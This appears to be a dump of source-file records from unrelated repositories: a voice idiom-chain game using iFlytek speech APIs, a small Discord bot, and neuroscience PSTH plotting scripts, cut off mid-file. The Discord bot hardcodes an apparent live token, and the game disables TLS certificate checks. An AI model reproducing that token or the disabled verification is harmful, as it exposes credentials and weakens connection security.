"blob_id": "3b372a6528d82a70bcba229687c811833dda7f2d", "content_id": "54ceb40a2d58ee3340bc723976d4bf5682930ffb", "detected_licenses": 
[], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 20, "license_type": "no_license", "max_line_length": 20, "num_lines": 1, "path": "/neuropy/__init__.py", "repo_name": "bernatguillen/neuronpy", "src_encoding": "UTF-8", "text": "from neuron import *" }, { "alpha_fraction": 0.6193548440933228, "alphanum_fraction": 0.625806450843811, "avg_line_length": 27.18181800842285, "blob_id": "342530154e29d025258a1568bd59e35599817380", "content_id": "052565f04710b7447a4415334461e56e1ca303aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 310, "license_type": "no_license", "max_line_length": 56, "num_lines": 11, "path": "/setup.py", "repo_name": "bernatguillen/neuronpy", "src_encoding": "UTF-8", "text": "from setuptools import setup\n\nsetup(name='neuropy',\n version='0.1dev',\n description='Simulating bursting neurons and CPG',\n url='http://github.com/bernatguillen/neuropy',\n author='Bernat Guillen',\n author_email='[email protected]',\n license='MIT',\n packages=['neuropy'],\n zip_safe=False)\n" } ]
3
classstudios/speak-idoim_game
https://github.com/classstudios/speak-idoim_game
71d7b3450103bbd379a8acb6450db46f175ac225
47386e93819aaa598dd1f9d65b87c8c19c825c87
eaef72f599334360c5f4901353fc2dc2f85077bb
refs/heads/master
2022-11-25T10:09:52.753397
2020-08-02T11:45:25
2020-08-02T11:45:25
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5019373893737793, "alphanum_fraction": 0.5203037858009338, "avg_line_length": 31.915788650512695, "blob_id": "78950415aa27fd5f556e3571dd7c5e2470fd95e1", "content_id": "563cf8c5cf485b9110beeb30d684fad53965c395", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14206, "license_type": "no_license", "max_line_length": 123, "num_lines": 380, "path": "/f1-idoim game.py", "repo_name": "classstudios/speak-idoim_game", "src_encoding": "UTF-8", "text": "## author: 教室工作室馆长\r\n## 成语接龙代码部分参考: 微信公众号:Charles的皮卡丘\r\n## 使用科大讯飞 语音听写和语音合成——人工智能API\r\nimport websocket\r\nimport datetime\r\nimport hashlib\r\nimport base64\r\nimport hmac\r\nimport json\r\nfrom urllib.parse import urlencode\r\nimport time\r\nimport ssl\r\nfrom wsgiref.handlers import format_date_time\r\nfrom datetime import datetime\r\nfrom time import mktime\r\nimport _thread as thread\r\nimport pyttsx3\r\nimport os\r\nimport pyaudio\r\nimport wave\r\nimport io\r\nimport sys\r\nimport random\r\n\r\ninput_filename = \"input.wav\" # 麦克风采集的语音输入\r\ninput_filepath = \"\" # 输入文件的path\r\nin_path = input_filepath + input_filename\r\n\r\nSTATUS_FIRST_FRAME = 0 # 第一帧的标识\r\nSTATUS_CONTINUE_FRAME = 1 # 中间帧标识\r\nSTATUS_LAST_FRAME = 2 # 最后一帧的标识\r\n\r\n#通过麦克风采集音频\r\ndef get_audio(filepath):\r\n \r\n CHUNK = 256\r\n FORMAT = pyaudio.paInt16\r\n CHANNELS = 1 # 声道数\r\n RATE = 16000 # 采样率\r\n RECORD_SECONDS = 5\r\n WAVE_OUTPUT_FILENAME = filepath\r\n p = pyaudio.PyAudio()\r\n print(\"开始成语接龙,请说四字成语:\")\r\n stream = p.open(format=FORMAT,\r\n channels=CHANNELS,\r\n rate=RATE,\r\n input=True,\r\n frames_per_buffer=CHUNK)\r\n\r\n print(\"*\"*5, \"开始录音:请在5秒内输入语音\")\r\n frames = []\r\n for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):\r\n i=i\r\n data = stream.read(CHUNK)\r\n frames.append(data)\r\n print(\"*\"*5, \"录音结束\\n\")\r\n stream.stop_stream()\r\n stream.close()\r\n p.terminate()\r\n wf = wave.open(WAVE_OUTPUT_FILENAME, 'wb')\r\n 
wf.setnchannels(CHANNELS)\r\n wf.setsampwidth(p.get_sample_size(FORMAT))\r\n wf.setframerate(RATE)\r\n wf.writeframes(b''.join(frames))\r\n wf.close()\r\n \r\n#调用讯飞语音听写API的类\r\nclass Ws_Param(object):\r\n # 初始化\r\n def __init__(self, APPID, APIKey, APISecret, AudioFile):\r\n self.APPID = APPID\r\n self.APIKey = APIKey\r\n self.APISecret = APISecret\r\n self.AudioFile = AudioFile\r\n\r\n # 公共参数(common)\r\n self.CommonArgs = {\"app_id\": self.APPID}\r\n # 业务参数(business),更多个性化参数可在官网查看\r\n self.BusinessArgs = {\"domain\": \"iat\", \"language\": \"zh_cn\",\"ptt\":0, \"accent\": \"mandarin\", \"vinfo\":1,\"vad_eos\":10000}\r\n\r\n # 生成url\r\n def create_url(self):\r\n url = 'wss://ws-api.xfyun.cn/v2/iat'\r\n # 生成RFC1123格式的时间戳\r\n now = datetime.now()\r\n date = format_date_time(mktime(now.timetuple()))\r\n\r\n # 拼接字符串\r\n signature_origin = \"host: \" + \"ws-api.xfyun.cn\" + \"\\n\"\r\n signature_origin += \"date: \" + date + \"\\n\"\r\n signature_origin += \"GET \" + \"/v2/iat \" + \"HTTP/1.1\"\r\n # 进行hmac-sha256进行加密\r\n signature_sha = hmac.new(self.APISecret.encode('utf-8'), signature_origin.encode('utf-8'),\r\n digestmod=hashlib.sha256).digest()\r\n signature_sha = base64.b64encode(signature_sha).decode(encoding='utf-8')\r\n\r\n authorization_origin = \"api_key=\\\"%s\\\", algorithm=\\\"%s\\\", headers=\\\"%s\\\", signature=\\\"%s\\\"\" % (\r\n self.APIKey, \"hmac-sha256\", \"host date request-line\", signature_sha)\r\n authorization = base64.b64encode(authorization_origin.encode('utf-8')).decode(encoding='utf-8')\r\n # 将请求的鉴权参数组合为字典\r\n v = {\r\n \"authorization\": authorization,\r\n \"date\": date,\r\n \"host\": \"ws-api.xfyun.cn\"\r\n }\r\n # 拼接鉴权参数,生成url\r\n url = url + '?' 
+ urlencode(v)\r\n # print(\"date: \",date)\r\n # print(\"v: \",v)\r\n # 此处打印出建立连接时候的url,参考本demo的时候可取消上方打印的注释,比对相同参数时生成的url与自己代码生成的url是否一致\r\n # print('websocket url :', url)\r\n return url\r\n\r\n\r\n# 收到websocket消息的处理\r\ndef on_message(ws, message):\r\n try:\r\n code = json.loads(message)[\"code\"]\r\n sid = json.loads(message)[\"sid\"]\r\n if code != 0:\r\n errMsg = json.loads(message)[\"message\"]\r\n print(\"sid:%s 响应报错:%s 代码为:%s\" % (sid, errMsg, code))\r\n\r\n else:\r\n data = json.loads(message)[\"data\"][\"result\"][\"ws\"]\r\n global result\r\n #result=\"\"\r\n for item in data:\r\n result += item[\"cw\"][0][\"w\"]\r\n\r\n except Exception as e:\r\n print(\"receive msg,but parse exception:\", e)\r\n\r\n return result\r\n\r\n# 收到websocket错误的处理\r\ndef on_error(ws, error):\r\n print(\"### 有错误啊:\", error)\r\n\r\n\r\n# 收到websocket关闭的处理\r\ndef on_close(ws):\r\n print(\"### 欢迎使用讯飞AI ###\")\r\n\r\n\r\n# 收到websocket连接建立的处理\r\ndef on_open(ws):\r\n def run(*args):\r\n frameSize = 8000 # 每一帧的音频大小\r\n intervel = 0.04 # 发送音频间隔(单位:s)\r\n status = STATUS_FIRST_FRAME # 音频的状态信息,标识音频是第一帧,还是中间帧、最后一帧\r\n\r\n with open(wsParam.AudioFile, \"rb\") as fp:\r\n while True:\r\n buf = fp.read(frameSize)\r\n # 文件结束\r\n if not buf:\r\n status = STATUS_LAST_FRAME\r\n # 第一帧处理\r\n # 发送第一帧音频,带business 参数\r\n # appid 必须带上,只需第一帧发送\r\n if status == STATUS_FIRST_FRAME:\r\n\r\n d = {\"common\": wsParam.CommonArgs,\r\n \"business\": wsParam.BusinessArgs,\r\n \"data\": {\"status\": 0, \"format\": \"audio/L16;rate=16000\",\r\n \"audio\": str(base64.b64encode(buf), 'utf-8'),\r\n \"encoding\": \"raw\"}}\r\n d = json.dumps(d)\r\n ws.send(d)\r\n status = STATUS_CONTINUE_FRAME\r\n # 中间帧处理\r\n elif status == STATUS_CONTINUE_FRAME:\r\n d = {\"data\": {\"status\": 1, \"format\": \"audio/L16;rate=16000\",\r\n \"audio\": str(base64.b64encode(buf), 'utf-8'),\r\n \"encoding\": \"raw\"}}\r\n ws.send(json.dumps(d))\r\n # 最后一帧处理\r\n elif status == STATUS_LAST_FRAME:\r\n d = {\"data\": {\"status\": 2, \"format\": 
\"audio/L16;rate=16000\",\r\n \"audio\": str(base64.b64encode(buf), 'utf-8'),\r\n \"encoding\": \"raw\"}}\r\n ws.send(json.dumps(d))\r\n time.sleep(1)\r\n break\r\n # 模拟音频采样间隔\r\n time.sleep(intervel)\r\n ws.close()\r\n\r\n thread.start_new_thread(run, ())\r\n#读取成语库数据data.txt文件\r\ndef readData(filepath):\r\n fp = open(filepath, 'r', encoding='utf-8')\r\n idiom_data = {}\r\n valid_idioms = {}\r\n for line in fp.readlines():\r\n line = line.strip()\r\n if not line: continue\r\n item = line.split('\\t')\r\n if len(item) != 3: continue\r\n if item[0][0] not in idiom_data:\r\n idiom_data[item[0][0]] = [item]\r\n else:\r\n idiom_data[item[0][0]].append(item)\r\n valid_idioms[item[0]] = item[1:]\r\n return idiom_data, valid_idioms\r\n#播放wav音频文件\r\ndef playwav():\r\n chunk = 1024\r\n wf = wave.open('output.wav', 'rb')\r\n p = pyaudio.PyAudio()\r\n stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),\r\n channels=wf.getnchannels(),\r\n rate=wf.getframerate(),\r\n output=True)\r\n data = wf.readframes(chunk)\r\n while len(data) > 0:\r\n stream.write(data)\r\n data = wf.readframes(chunk)\r\n stream.stop_stream()\r\n stream.close()\r\n p.terminate()\r\n\r\n#将pcm加入头文件组成完整的wav音频文件\r\ndef pcm2wav(pcm_file, save_file, channels=1, bits=16, sample_rate=16000):\r\n pcmf=open(pcm_file, 'rb')\r\n pcmdata = pcmf.read()\r\n pcmf.close()\r\n if bits % 8 != 0:\r\n raise ValueError(\"bits % 8 must == 0. 
now bits:\" + str(bits))\r\n wavfile=wave.open(save_file, 'wb')\r\n wavfile.setnchannels(channels)\r\n wavfile.setsampwidth(bits//8)\r\n wavfile.setframerate(sample_rate)\r\n wavfile.writeframes(pcmdata)\r\n wavfile.close()\r\n#调用讯飞语音合成API的类\r\nclass Ws_Param2(object):\r\n # 初始化\r\n def __init__(self, APPID, APIKey, APISecret, Text):\r\n self.APPID = APPID\r\n self.APIKey = APIKey\r\n self.APISecret = APISecret\r\n self.Text = Text\r\n\r\n # 公共参数(common)\r\n self.CommonArgs = {\"app_id\": self.APPID}\r\n # 业务参数(business),更多个性化参数可在官网查看\r\n self.BusinessArgs = {\"aue\": \"raw\", \"auf\": \"audio/L16;rate=16000\", \"vcn\": \"x2_nannan\", \"tte\": \"utf8\"}\r\n self.Data = {\"status\": 2, \"text\": str(base64.b64encode(self.Text.encode('utf-8')), \"UTF8\")}\r\n #使用小语种须使用以下方式,此处的unicode指的是 utf16小端的编码方式,即\"UTF-16LE\"”\r\n #self.Data = {\"status\": 2, \"text\": str(base64.b64encode(self.Text.encode('utf-16')), \"UTF8\")}\r\n\r\n \r\n # 生成url\r\n def create_url(self):\r\n url = 'wss://tts-api.xfyun.cn/v2/tts'\r\n # 生成RFC1123格式的时间戳\r\n now = datetime.now()\r\n date = format_date_time(mktime(now.timetuple()))\r\n\r\n # 拼接字符串\r\n signature_origin = \"host: \" + \"ws-api.xfyun.cn\" + \"\\n\"\r\n signature_origin += \"date: \" + date + \"\\n\"\r\n signature_origin += \"GET \" + \"/v2/tts \" + \"HTTP/1.1\"\r\n # 进行hmac-sha256进行加密\r\n signature_sha = hmac.new(self.APISecret.encode('utf-8'), signature_origin.encode('utf-8'),\r\n digestmod=hashlib.sha256).digest()\r\n signature_sha = base64.b64encode(signature_sha).decode(encoding='utf-8')\r\n\r\n authorization_origin = \"api_key=\\\"%s\\\", algorithm=\\\"%s\\\", headers=\\\"%s\\\", signature=\\\"%s\\\"\" % (\r\n self.APIKey, \"hmac-sha256\", \"host date request-line\", signature_sha)\r\n authorization = base64.b64encode(authorization_origin.encode('utf-8')).decode(encoding='utf-8')\r\n # 将请求的鉴权参数组合为字典\r\n v = {\r\n \"authorization\": authorization,\r\n \"date\": date,\r\n \"host\": \"ws-api.xfyun.cn\"\r\n }\r\n # 拼接鉴权参数,生成url\r\n 
url = url + '?' + urlencode(v)\r\n # print(\"date: \",date)\r\n # print(\"v: \",v)\r\n # 此处打印出建立连接时候的url,参考本demo的时候可取消上方打印的注释,比对相同参数时生成的url与自己代码生成的url是否一致\r\n # print('websocket url :', url)\r\n return url\r\n\r\ndef on_message2(ws2, message):\r\n try:\r\n message =json.loads(message)\r\n code = message[\"code\"]\r\n sid = message[\"sid\"]\r\n audio = message[\"data\"][\"audio\"]\r\n audio = base64.b64decode(audio)\r\n status = message[\"data\"][\"status\"]\r\n #print(message)\r\n if status == 2:\r\n print(\"结束讯飞AI调用\")\r\n ws2.close()\r\n if code != 0:\r\n errMsg = message[\"message\"]\r\n print(\"sid:%s call error:%s code is:%s\" % (sid, errMsg, code))\r\n else:\r\n\r\n with open('output.pcm', 'ab') as f:\r\n f.write(audio)\r\n pcm2wav(\"output.pcm\",\"output.wav\")\r\n except Exception as e:\r\n print(\"receive msg,but parse exception:\", e)\r\n\r\n\r\n\r\n# 收到websocket错误的处理\r\ndef on_error2(ws2, error):\r\n print(\"### error:\", error)\r\n\r\n\r\n# 收到websocket关闭的处理\r\ndef on_close2(ws2):\r\n print(\"### closed ###\")\r\n\r\n\r\n\r\n# 收到websocket连接建立的处理\r\ndef on_open2(ws2):\r\n def run(*args):\r\n d = {\"common\": wsParam2.CommonArgs,\r\n \"business\": wsParam2.BusinessArgs,\r\n \"data\": wsParam2.Data,\r\n }\r\n d = json.dumps(d)\r\n #print(\"------>开始发送文本数据\")\r\n ws2.send(d)\r\n if os.path.exists('output.pcm'):\r\n os.remove('output.pcm')\r\n \r\n\r\n thread.start_new_thread(run, ())\r\n\r\n\r\n\r\nif __name__ == \"__main__\": \r\n #engine = pyttsx3.init()\r\n while 1:\r\n idiom_data,valid_idioms = readData('data.txt')\r\n ai_answer = None\r\n get_audio(in_path)\r\n wsParam = Ws_Param(APPID='', APIKey='',\r\n APISecret='',\r\n AudioFile=r'input.wav')\r\n websocket.enableTrace(False)\r\n wsUrl = wsParam.create_url()\r\n result=\"\"\r\n ws = websocket.WebSocketApp(wsUrl, on_message=on_message, on_error=on_error, on_close=on_close)\r\n ws.on_open = on_open\r\n ws.run_forever(sslopt={\"cert_reqs\": ssl.CERT_NONE})\r\n print(\"识别到:\",result)\r\n idiom=result\r\n 
idiom = idiom.strip()\r\n try:\r\n answers = idiom_data[idiom[-1]]\r\n answer = random.choice(answers)\r\n ai_answer = answer.copy()\r\n wsParam2 = Ws_Param2(APPID='', APIKey='',\r\n APISecret='',\r\n Text=\"我接:\"+ai_answer[0])\r\n print(\"我接:\",ai_answer[0])\r\n except Exception as e:\r\n wsParam2 = Ws_Param2(APPID='', APIKey='',\r\n APISecret='',\r\n Text=\"你说的是神马成语!不会接\")\r\n websocket.enableTrace(False)\r\n wsUrl2 = wsParam2.create_url()\r\n ws2 = websocket.WebSocketApp(wsUrl2, on_message=on_message2, on_error=on_error2, on_close=on_close2)\r\n ws2.on_open = on_open2\r\n ws2.run_forever(sslopt={\"cert_reqs\": ssl.CERT_NONE})\r\n playwav()\r\n #print(\"我的回答是:\",ai_answer[0])\r\n #engine.say(ai_answer[0])\r\n #engine.runAndWait()\r\n\r\n \r\n" } ]
1
sidhubotdev/bot
https://github.com/sidhubotdev/bot
aacaedd378e563bfb7781c3f234567def2bf9baa
7bda59f2566da4fa098809db3efcf503641ee4c1
ee6bf888fb99cfce4a16fe5127d74bf02ce5c90a
refs/heads/master
2023-04-07T11:57:26.347342
2021-04-13T11:01:05
2021-04-13T11:01:05
357,508,461
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.727554202079773, "alphanum_fraction": 0.7492260336875916, "avg_line_length": 22, "blob_id": "031c58d6709786cf933b6eb56495d14bb545111a", "content_id": "7172e4b9acc825192d47aba66ccc661df74b3661", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 323, "license_type": "no_license", "max_line_length": 73, "num_lines": 14, "path": "/main.py", "repo_name": "sidhubotdev/bot", "src_encoding": "UTF-8", "text": "from discord.ext import commands\nfrom discord.ext.commands import Bot\n\nclient: Bot = commands.Bot(command_prefix=\"&\")\n\[email protected]\nasync def on_ready():\n print(\"bot is ready\")\n\[email protected]()\nasync def hello(ctx):\n await ctx.send(\"HI\")\n\nclient.run(\"ODMwMzMxMDMyODA4MzI1MTYw.YHFICQ.KKslb8D3r4bvtYWOSNI01RiHctk\")\n\n" } ]
1
bjmedina/PSTH
https://github.com/bjmedina/PSTH
f4a100c77d05d53649073d8e6b786aeefa558c02
e4d19b742809cfa8f6e9ce524cb6c80701e69fba
3c4949c3daa6b53bac30da193beccddef4b1adb9
refs/heads/master
2020-06-04T09:38:18.994692
2019-10-10T02:03:29
2019-10-10T02:03:29
191,970,378
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.5129870176315308, "alphanum_fraction": 0.6298701167106628, "avg_line_length": 14.399999618530273, "blob_id": "93e9677103bc519e231c79df3e2975e53b885c4b", "content_id": "521fe71dbf0b152b017c9edb335383d40fb8a8f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 154, "license_type": "no_license", "max_line_length": 42, "num_lines": 10, "path": "/nwb_plots.py~", "repo_name": "bjmedina/PSTH", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 20 12:48:05 2018\n\n@author: Bryan Medina \n\n(c) 2019 Allen Institute for Brain Science\n\n\"\"\"\n" }, { "alpha_fraction": 0.5220656991004944, "alphanum_fraction": 0.5514084696769714, "avg_line_length": 30.776119232177734, "blob_id": "87d6324c5e83e54a967d2ebe6436b2a8d33323a6", "content_id": "4d57ef6c6e95e525aa04d31a2d73c00bcf556846", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4260, "license_type": "no_license", "max_line_length": 124, "num_lines": 134, "path": "/nwb_plots_firing_rates.py", "repo_name": "bjmedina/PSTH", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 1 11:50:02 EDT 2019\n\n@author: Bryan Medina\n\"\"\"\n###### Imports ########\nfrom nwb_plots_functions import *\n########################\n\n###### UPDATE PATH #################################\nDIRECTORY = '/Users/bjm/Documents/CMU/Research/data'\nVAR_DIREC = '/Users/bjm/Documents/CMU/Research/data/plots/variations/'\nMICE_ID = ['424448', '421338', '405751']\nMOUSE_ID = '421338'\n\n####################################################\n\n# Get file from directory\nspikes_nwb_file = os.path.join(DIRECTORY, 'mouse' + MOUSE_ID + '.spikes.nwb')\nnwb = h5.File(spikes_nwb_file, 'r')\n\nprobe_names = nwb['processing']\n\n# keeps track of max firing rate for each cell in \nprobe_fr = {}\n\ncolors = 
{'424448':'red',\n '421338':'green',\n '405751':'blue'}\n\n# firing rate filename\nfilename = MOUSE_ID + '_probes_fr'\nPLOT_ALL = True\n\nrows = 2\ncols = 2\n\n# Ideally, you should do this for every mouse.\n\n# We want to check to see if we have this data\ntry:\n with open(filename+\"_\", 'rb') as f:\n probe_fr = pickle.load(f)\n \nexcept:\n # only keep track of maximal firing rates...\n probe_fr = {}\n \n for probe_name in probe_names:\n # Getting all data for a given cell\n # File to get data from.\n probe_filename = MOUSE_ID + \"_\" + probe_name\n print(probe_filename)\n \n try:\n with open(probe_filename, 'rb') as f:\n # Plotting all curves for every region for a given mouse.\n probe = pickle.load(f)\n \n except FileNotFoundError:\n saveProbeData(MOUSE_ID, probe_name, nwb)\n print(\"Run again nwb_plots with plotting off\")\n sys.exit(1)\n \n probe_fr[probe_name] = []\n \n for cell in probe.getCellList():\n # Get max, add it here...\n probe_fr[probe_name].append(probe.getCell(cell).max_frate)\n\n# Plot everything\nfor probe_name in probe_names:\n # Plot variability of every region\n if(PLOT_ALL):\n # Plotting how variable neuron can be\n for probe_name in probe_names:\n\n plt.title(\"Mouse: \" + str(MOUSE_ID) + \" / \" + probe_name + \" Variation\")\n plt.ylim(0, 14)\n plt.xlabel(\"Maximal Firing Rate (Spikes/Sec)\")\n plt.ylabel(\"Number of Neurons\")\n plt.hist(probe_fr[probe_name], bins = 100, edgecolor='black')\n plt.savefig(VAR_DIREC + MOUSE_ID + probe_name + \"_variations.png\")\n plt.clf()\n\n\n# Plotting multiple summary plots in one plot.\nfig, axes = plt.subplots(nrows=2, ncols=2, figsize=(8,8))\nfig.suptitle(\"Variation in Maximal Firing Rates\")\nfig.text(0.5, 0.04, 'Maximal Firing Rate (Spikes/sec)', ha='center')\nfig.text(0.04, 0.5, 'Number of Neurons', va='center', rotation='vertical')\n\nvariability = []\ncurves = {}\ni = 0\n\n# Plotting 4 plots in one figure.\nfor row in range(0, rows):\n for col in range(0, cols):\n\n if( not (row + 1 == rows 
and col + 1 == cols) ):\n MOUSE = MICE_ID[i]\n filename = MOUSE + '_probes_fr'\n \n with open(filename, 'rb') as f:\n probe_fr = pickle.load(f)\n \n for probe_name in probe_names:\n variability.extend(probe_fr[probe_name])\n \n axes[row, col].set_ylim([0, 90])\n axes[row, col].set_xlim([0, 100])\n axes[row, col].set_title(\"Mouse %s\" % (MOUSE))\n ys, bins, c = axes[row, col].hist(variability, bins = 100,color=colors[MOUSE], edgecolor='black', alpha=0.7) \n curves[MOUSE] = [LSQUnivariateSpline(bins[0:len(bins)-1], ys, [10, 30, 55, 70, 100]), bins[0:len(bins)-1]]\n i = i+1\n variability = []\n\n else:\n axes[row, col].set_ylim([0, 90])\n axes[row, col].set_xlim([0, 100])\n axes[row, col].set_title(\"All Variations\")\n\n for ID in MICE_ID:\n axes[row, col].plot(curves[ID][1], curves[ID][0](curves[ID][1]), label=ID, color=colors[ID], alpha=0.7)\n axes[row, col].legend()\n\nplt.savefig(VAR_DIREC + \"firing_rate_variations.png\")\n\n# Save the probe_fr file.\nwith open(filename, 'wb') as f:\n pickle.dump(probe_fr, f)\n\n\n" }, { "alpha_fraction": 0.569037675857544, "alphanum_fraction": 0.6150627732276917, "avg_line_length": 19.782608032226562, "blob_id": "35c180e99f5472830120ca9cd901ca7cc9ce05ff", "content_id": "8d094256deb105a7760acfa80e859fdb5d0b1e9c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 478, "license_type": "no_license", "max_line_length": 52, "num_lines": 23, "path": "/nwb_plots_firing_rates.py~", "repo_name": "bjmedina/PSTH", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 12 09:25:21 EDT 2019\n\n@author: Bryan Medina\n\"\"\"\n###### Imports ########\nfrom nwb_plots_functions import *\nfrom scipy.interpolate import LSQUnivariateSpline\n\nimport h5py as h5\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pickle\nimport sys\n########################\n\n###### UPDATE PATH 
#################################\nDIRECTORY = '/Users/bjm/Documents/CMU/Research/data'\n\nMOUSE_ID = '424448'\n" }, { "alpha_fraction": 0.644059419631958, "alphanum_fraction": 0.656930685043335, "avg_line_length": 39.400001525878906, "blob_id": "536f36827c7296db3f346a3f9d77f0fd769feb08", "content_id": "3da174b5e1b86266620d469a54a0cfd667162598", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2020, "license_type": "no_license", "max_line_length": 292, "num_lines": 50, "path": "/README.md", "repo_name": "bjmedina/PSTH", "src_encoding": "UTF-8", "text": "# Plots for _Neuropixels_ Data\n---\n\nThese files assume the following hierarchy: \n\n```misc\n~/\n data/ (code and data go here) [in code, put path in DIRECTORY]\n plots/ [in code, put path in SUMMARY_PLOTS_DIRECTORY]\n cells/ (PSTH plots for every cell in every probe) [put path in CELL_PLOTS_DIRECTORY]\n probeA/ [ you just have to make these directories, with those exact names ]\n probeB/\n ...\n probeF/\n percentile/ (Plots for percentiles of every mouse)\n probes/ (PSTH plots averaged across all cells and trials) [put path in PROBE_PLOTS_DIRECTORY]\n variations/ (directories of class names) [in code, put path in VAR_DIREC]\n trial_data/ (data calculated for every trial)\n```\n\n\n## Libraries Needed\n---\n``` library >= version ``` || ``` pip install library ```\n\n```rpy2 >= 3.0.4``` || ```pip install rpy2``` \n\n```numpy >= 1.14.2``` || ```pip install numpy```\n\n```pickle >= 4.0``` || ```pip install pickle```\n\n```h5py >= 2.8.0``` || ```pip install h5py```\n\n```matplotlib >= 3.0.2``` || ```pip install matplotlib```\n\n\n## Steps for Running\n---\n\n1. Make sure you have all the directories and folders set up. Follow the ```[...put path in (VARIABLE_NAME_HERE)]``` comments to help you figure out where to put the paths in the code (Code could be written to automatically create the directories...).\n\n2. Run ```nwb_plots.py```. 
If everything goes well, the output before the program ends should be ```run again```.\n\n3. Run ```nwb_plots.py``` again. Repeat 2 and 3 for all mice (you can change the mouse you're working on by looking for the variable ```MOUSE_ID``` in the code). You should now see plots in ```SUMMARY_PLOTS_DIRECTORY``` and ```CELL_PLOTS_DIRECTORY```. These two steps should take the longest.\n\n4. Run ```nwb_plots_percentile.py``` for each mouse. These plots will be saved in ```percentile```.\n\n5. Run ```nwb_dropout.py``` for each mouse. These plots will be saved in ```probes```.\n\n__NOTE__: ```VAR_DIREC``` is no longer needed. Neither is ```nwb_trials.py```\n" }, { "alpha_fraction": 0.5574324131011963, "alphanum_fraction": 0.6148648858070374, "avg_line_length": 16.41176414489746, "blob_id": "f1ceb9e36cb823e4b33c08220f4e1b291cd00f65", "content_id": "656599e6fa28608e1da62c916096475d32d7b990", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 296, "license_type": "no_license", "max_line_length": 51, "num_lines": 17, "path": "/nwb_plots_functions.py~", "repo_name": "bjmedina/PSTH", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 12 09:25:21 EDT 2019\n\n@author: Bryan Medina \n\n\"\"\"\n\n###### Imports ########\nfrom scipy.ndimage.filters import gaussian_filter1d\n\nimport h5py as h5\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n########################\n" }, { "alpha_fraction": 0.5260869860649109, "alphanum_fraction": 0.5625603795051575, "avg_line_length": 30.12030029296875, "blob_id": "d41aee05cab0495e56001e944cea25456bb1f1a8", "content_id": "dcde32ddc533a9a43345f6cd9d227bfc81113a4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4140, "license_type": "no_license", "max_line_length": 116, "num_lines": 133, "path": "/nwb_plots_percentile.py", "repo_name": "bjmedina/PSTH", 
"src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 1 11:50:02 EDT 2019\n\n@author: Bryan Medina\n\"\"\"\n###### Imports ########\nfrom nwb_plots_functions import *\nfrom scipy.interpolate import LSQUnivariateSpline\n\nimport h5py as h5\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pickle\nimport sys\n########################\n\n###### UPDATE PATH #################################\nDIRECTORY = '/Users/bjm/Documents/CMU/Research/data'\nVAR_DIREC = '/Users/bjm/Documents/CMU/Research/data/plots/variations/'\nPERC_PLOTS_DIRECTORY = '/Users/bjm/Documents/CMU/Research/data/plots/percentile/'\nMOUSE_ID = '424448'\n####################################################\n\n# Get file from directory\nspikes_nwb_file = os.path.join(DIRECTORY, 'mouse' + MOUSE_ID + '.spikes.nwb')\nnwb = h5.File(spikes_nwb_file, 'r')\n\nprobes = nwb['processing']\nprobe_names = [name for name in probes.keys()]\n\n# save all curves for all regions\nmid = {}\ntop = {}\nbot = {}\n\n# Used for plotting\nrows = 3\ncols = 2\n\nfor probe_name in probe_names:\n # Calculate median neuron, and also 90th and 10th percentile neuron\n median_n = []\n top_ten = []\n bot_ten = []\n \n probe_filename = MOUSE_ID + \"_\" + probe_name\n\n with open(probe_filename, 'rb') as f:\n probe = pickle.load(f)\n \n for xval in xs:\n \n rates = []\n \n for cell in probe.getCellList():\n rates.append(probe.getCell(cell).lsq(xval))\n\n # Sort this list...\n rates.sort()\n \n median_n.append(np.median(rates))\n top_ten.append(np.percentile(rates, 75))\n bot_ten.append(np.percentile(rates, 25))\n \n # save the curves\n mid[probe_name] = LSQUnivariateSpline(xs, median_n, knots[1:-1])\n top[probe_name] = LSQUnivariateSpline(xs, top_ten, knots[1:-1])\n bot[probe_name] = LSQUnivariateSpline(xs, bot_ten, knots)\n\n\n# Plotting median, 75th percentile, and 25th percentile neuron\n\n# Do multiple plots on one figure\nfig, axes = plt.subplots(nrows=3, 
